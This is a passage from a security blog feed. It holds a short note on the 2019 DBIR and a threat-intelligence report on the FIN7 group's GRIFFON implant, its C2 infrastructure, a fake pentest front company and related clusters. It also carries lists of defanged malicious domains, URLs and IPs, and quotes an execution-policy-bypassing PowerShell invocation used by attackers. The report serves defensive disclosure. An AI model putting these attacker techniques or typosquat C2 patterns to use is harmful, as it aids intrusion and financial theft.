  • http://www.jnts1532[.]cn/phpcms/templates/default/message/bottom.jpg
  • http://www.rhooters[.]com/bbs/data/m_photo/bottom.jpg
  • https://buttyfly.000webhostapp[.]com/userfiles/file/sliderpic.jpg
Domains and IPs
  • buttyfly.000webhostapp[.]com
  • planar-progress.000webhostapp[.]com
  • 120.192.73[.]202
  • 180.182.52[.]76
2019. május 8.

The 2019 DBIR Is Out

Once again, we are happy to support a large, voluntary, collaborative effort like the 2019 Data Breach Investigations Report. While our data contribution is completely anonymous, it is based in some of the 2018 data set that our private report customers receive from our efforts to protect all of our customers against every type of malware threat regardless of its source.

In general, the report is an excellent point of reference because it is sourced from so many organizations handling various incidents. This year, the Public Administration sector tops the list by far in terms of reported incidents and data along with the Information sector. “Cyber-Espionage is rampant in the Public sector, with State-affiliated actors accounting for 79 percent of all breaches involving external actors” and “Web applications are targeted with availability attacks as well as leveraged for access to cloud-based organizational email accounts.” Small businesses made up 43% of the reported DBIR breach victims in 2018.

“Use 2FA” is a common refrain throughout the report, along with “squish the phish”. Both two factor authentication and phishing awareness, training, and handling can go a long ways toward improving security in all organizations.

Enjoy another fine read this year!

2019. május 8.

FIN7.5: the infamous cybercrime rig “FIN7” continues its activities

On August 1, 2018, the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig. FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015. Interestingly, this threat actor created fake companies in order to hire remote pentesters, developers and interpreters to participate in their malicious business. The main goal behind its malicious activities was to steal financial assets from companies, such as debit cards, or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts.

In 2018-2019, researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7, leading the researchers to believe that this threat actor had remained active despite the 2018 arrests. In addition, during the investigation, we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations.

Recent FIN7 campaigns

The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year. Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target. The spear phishing campaigns were remarkably sophisticated from a social engineering perspective. In various cases, the operators exchanged numerous messages with their victims for weeks before sending their malicious documents. The emails were efficient social-engineering attempts that appealed to a vast number of human emotions (fear, stress, anger, etc.) to elicit a response from their victims. One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases, leading us to think that more than 130 companies had been targeted by the end of 2018.

Malicious Documents

We have seen two types of documents sent to victims in these spear phishing campaigns. The first one exploits the INCLUDEPICTURE[1] feature of Microsoft Word to get context information about the victim’s computer, and the availability and version number of Microsoft Word. The second one, which in many cases is an Office document protected with a trivial password, such as “12345”, “1234”, etc., uses macros to execute a GRIFFON implant on the target’s computer. In various cases, the associated macro also scheduled tasks to make GRIFFON persistent.

Interestingly, following some open-source publications about them, the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit, which they employed during the summer of 2018. The new builder inserts random values in the Author and Company metadata fields. Moreover, the builder allows these to modify different IOCs, such as the filenames of wscript.exe or sctasks.exe copies, etc.

wscript.exe copy sctasks copy Task name C2 byzNne10.exe byzNne17.exe TaskbyzNne logitech-cdn.com c9FGG10.exe c9FGG17.exe Taskc9FGG logitech-cdn.com zEsb10.exe zEsb17.exe TaskzEsb servicebing-cdn.com

IOCs extracted from docs which use sctasks for GRIFFON persistence

Author Company wscript.exe copy C2 mogjxjtvte mogjxjtvte mswmex44.exe logitech-cdn[.]com soxvremvge soxvremvge c9FGG10.exe logitech-cdn[.]com gareljtjhvd gareljtjhvd zEsb10.exe servicebing-cdn[.]com

IOCs extracted from regular documents associated to GRIFFON


Griffon Malware attack pattern

The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. We were able to obtain four different modules during the investigation.

Reconnaissance module

The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators. Interestingly, more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage, from the date and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation’s monitors.

Meterpreter downloader

The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as “Tinymet“. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (eg. with the key equal to 0x50 or 0x51) piece of meterpreter shellcode to execute.

Screenshot module

The third module allows the operators to take a screenshot of the remote system. To do that, it also drops a PowerShell script on the workstation to execute. The script executes an open-source .NET class used for taking a screenshot. The resulting screenshot is saved at “%TMP%/image.png”, sent back to the attackers by the GRIFFON implant and then deleted.

Persistence module

The last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method.

Through its light weight and modular architecture, the GRIFFON implant is the perfect validator. Even though we have been able to retrieve four different modules, it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim’s workstation.

On the hunt for GRIFFON infrastructure

Attackers make mistakes, and FIN7 are no exception. The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year. In order to trick blue teams and other DFIR analysts, the operators created fake HTTP 302 redirection to various Google services on their C2s servers.

HTTP/1.1 302 Found Server: nginx Date: [retracted] Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Location: https://cloud.google.com/cdn/

Returned headers for most of the GRIFFON C2s servers on port 443

This error allowed us to follow the infrastructure week by week, until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018. A few days after the tweet, in January 2019, the operators changed their landing page in order to prevent this type of tracking against their infrastructure.

Fake pentest company

During the investigation related to the GRIFFON infrastructure, we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company.

According to the website, that domain supposedly belongs to a legitimate security company “fully owned by the Russian Government” (sic.) and having offices in “Moscow, Saint Petersburg and Yekaterinburg”, but the address says the company is located in Trump Tower, in New York. Given FIN7’s previous use of false security companies, we decided to look deeper into this one.

As we were looking at the content of the website, it became evident that almost all of the text used was lifted from legitimate security-company websites. Phrases and sentences were borrowed from at least the following companies/sites:

  • DKSec – www.dksec.com
  • OKIOK – www.okiok.com/services/tailored-solutions
  • MainNerve – www.mainnerve.com
  • Datics – www.datatics.com/cyber-security
  • Perspective Risk – www.perspectiverisk.com
  • Synack – https://www.synack.com/company
  • FireEye – https://www.fireeye.com/services/penetration-testing.html

This company seems to have been used by the FIN7 threat actor to hire new people as translators, developers and pentesters. During our research, we found various job advertisements associated with the company on freelance and remote-work websites.

In addition to that, various individuals have mentioned the company in their resumes. We believe that some of these individuals may not even be aware that they are working for a cybercrime business.

Links to other intrusion sets

While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019, we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set. The link between these threat actors and FIN7 is still weak, but we decided to disclose a few hints regarding these in this blog post.


In his history, FIN7 has overlapped several times with Cobalt/EmpireMonkey in terms of TTPs. This activity cluster, which Kaspersky Lab has followed for a few years, uses various implants for targeting mainly banks, and developers of banking and money processing software solutions. At the end of 2018, the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks. After a successful penetration, it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network, where it can monetize its access.

FIN7’s last campaigns were targeting banks in Europe and Central America. This threat actor stole suspected of stealing €13 million from Bank of Valetta, Malta earlier this year.

Example of malicious documents used in the end of 2018 to beginning of 2019

A few interesting overlaps in recent FIN7 campaigns:

  • Both used macros to copy wscript.exe to another file, which began with “ms” (mses.exe – FIN7, msutil.exe – EmpireMonkey).
  • Both executed a JScript file named “error” in %TEMP% (Errors.txt in the case of FIN7, Errors.bat for EmpireMonkey).
  • Both used DocuSign decoy documents with different macros. The macros popped the same “Document decryption error” error message—even if macro code remain totally different.

We have a high level of confidence in a historic association between FIN7 and Cobalt, even though we believe that these two clusters of activity are operated by different teams.


AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.

To deliver their malware, the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882, or documents with Ole2Link and SCT. They also use AutoIT droppers, password-protected EXE files and even ISO images. What is interesting, in some emails, they ask targets to phone them if they have any questions, like the FIN7 guys do.

Example of AveMaria spearphing emails. Criminals suggest calling them.

During the investigation into FIN7, our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria. Basically, two servers in the same IP range and AS14576 (autonomous system) share a non-standard SSH port, which is 222. One of the servers is a Griffon C2, and the other one, an AveMaria C2.

Distribution of targets is another factor suggesting that these two malware families may be connected. We analyzed AveMaria targets during February and March of 2019. The spearphishing emails were sent to various kinds of businesses only and did not target individuals. Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies. We also spotted several typical FIN7 targets, such as retailers and hotels. Most AveMaria targets (72%) were in the EU.


At the end of 2018, while searching for new FIN7 campaigns via telemetry, we discovered a set of activity that we temporarily called “CopyPaste” from a previously unknown APT. Interestingly, this actor targeted financial entities and companies in one African country, which lead us to think that CopyPaste was associated with cybermercenaries or a training center.

This set of activity relied on open-source tools, such as Powershell Empire, and well-documented red teaming techniques, in order to get a foothold within the victim’s networks and avoid detection.

Here are the main similarities between CopyPaste and FIN7:

  • Both used the same Microsoft PowerShell argument obfuscation order: “powershell.exe -NoP -NonI -ExecutionPolicy Bypass”. We have only seen FIN7 and CopyPaste use this argument list for executing their malicious Powershell Scripts.
  • Both used decoy 302 HTTP redirections and typosquatting on their C2s (reminiscent of Cobalt and FIN7). The Empire C2s associated with CopyPaste had decoy redirections to Digitcert and Microsoft websites and used decoy job employment and tax websites with decoy redirections to host their payloads. FIN7 and Cobalt used decoy 302 HTTP redirections too, FIN7 on its GRIFFON C2s before January 2018, and Cobalt, on its staging servers, similar to CopyPaste.
  • Quite recently, FIN7 threat actors typosquatted the brand “Digicert” using the domain name digicert-cdn[.]com, which is used as a command and control server for their GRIFFON implants. CopyPaste, in turn, also typosquatted this brand with their domains digicertweb[.]com and digi-cert[.]org, both used as a Powershell Empire C2 with decoy HTTP 302 redirects to the legitimate Digicert website.

The links between CopyPaste and FIN7 are still very weak. It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7.


During 2018, Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader will have an impact on the group’s operations. However, recent data seems to indicate that the attacks have continued without significant drawbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. We observe, with various level of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

The first of them is the well-known FIN7, which specializes in attacking various companies to get access to financial data or PoS infrastructure. They rely on a Griffon JS backdoor and Cobalt/Meterpreter, and in recent attacks, Powershell Empire. The second one is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and similar infrastructure but targets only financial institutions and associated software/services providers.

We link the AveMaria botnet to these two groups with medium confidence: AveMaria’s targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The last piece is the newly discovered CopyPaste group, who targeted financial entities and companies in one African country, which lead us to think that CopyPaste was associated with cybermercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7.

All of the aforementioned groups greatly benefit from unpatched systems in corporate environments. They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework. So far, the groups have not used any zero-days.

FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they are quite successful. As with their previous fake company “Combi Security”, we are confident that they continue to create new personas for use in either targeting or recruiting under a “new” brand, “IPC”.

More information about these and related attacks is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

Indicators of compromise AveMaria
  • tain.warzonedns[.]com
  • noreply377.ddns[.]net
  • server.mtcc[.]me
  • doddyfire.dyndns[.]org
  • toekie.ddns[.]net
  • warmaha.warzonedns[.]com
  • digi-cert[.]org
  • somtelnetworks[.]com
  • geotrusts[.]com
  • secureclientupdate[.]com
  • digicertweb[.]com
  • sport-pesa[.]org
  • itaxkenya[.]com
  • businessdailyafrica[.]net
  • infotrak-research[.]com
  • nairobiwired[.]com
  • k-24tv[.]com
  • hpservice-cdn[.]com
  • realtek-cdn[.]com
  • logitech-cdn[.]com
  • pci-cdn[.]com
  • appleservice-cdn[.]com
  • servicebing-cdn[.]com
  • cisco-cdn[.]com
  • facebook77-cdn[.]com
  • yahooservices-cdn[.]com
  • globaltech-cdn[.]com
  • infosys-cdn[.]com
  • google-services-s5[.]com
  • instagram-cdn[.]com
  • mse-cdn[.]com
  • akamaiservice-cdn[.]com
  • booking-cdn[.]com
  • live-cdn2[.]com
  • cloudflare-cdn-r5[.]com
  • cdnj-cloudflare[.]com
  • bing-cdn[.]com
  • servicebing-cdn[.]com
  • cdn-yahooapi[.]com
  • cdn-googleapi[.]com
  • googl-analytic[.]com
  • mse-cdn[.]com
  • tw32-cdn[.]com
  • gmail-cdn3[.]com
  • digicert-cdn[.]com
  • vmware-cdn[.]com
  • exchange-cdn[.]com
  • cdn-skype[.]com
  • windowsupdatemicrosoft[.]com
  • msdn-cdn[.]com
  • testing-cdn[.]com
  • msdn-update[.]com

In order to preserve the privacy of the potential victims, we stripped the targeted entities from the domain names.

  • (entity)-corporate[.]com
  • (entity)-cert[.]com
  • (entity)-no[.]org
  • (entity)-fr[.]org
  • (entity)-acquisition[.]org
  • (entity)-trust[.]org
  • riscomponents[.]pw
  • nlscdn[.]com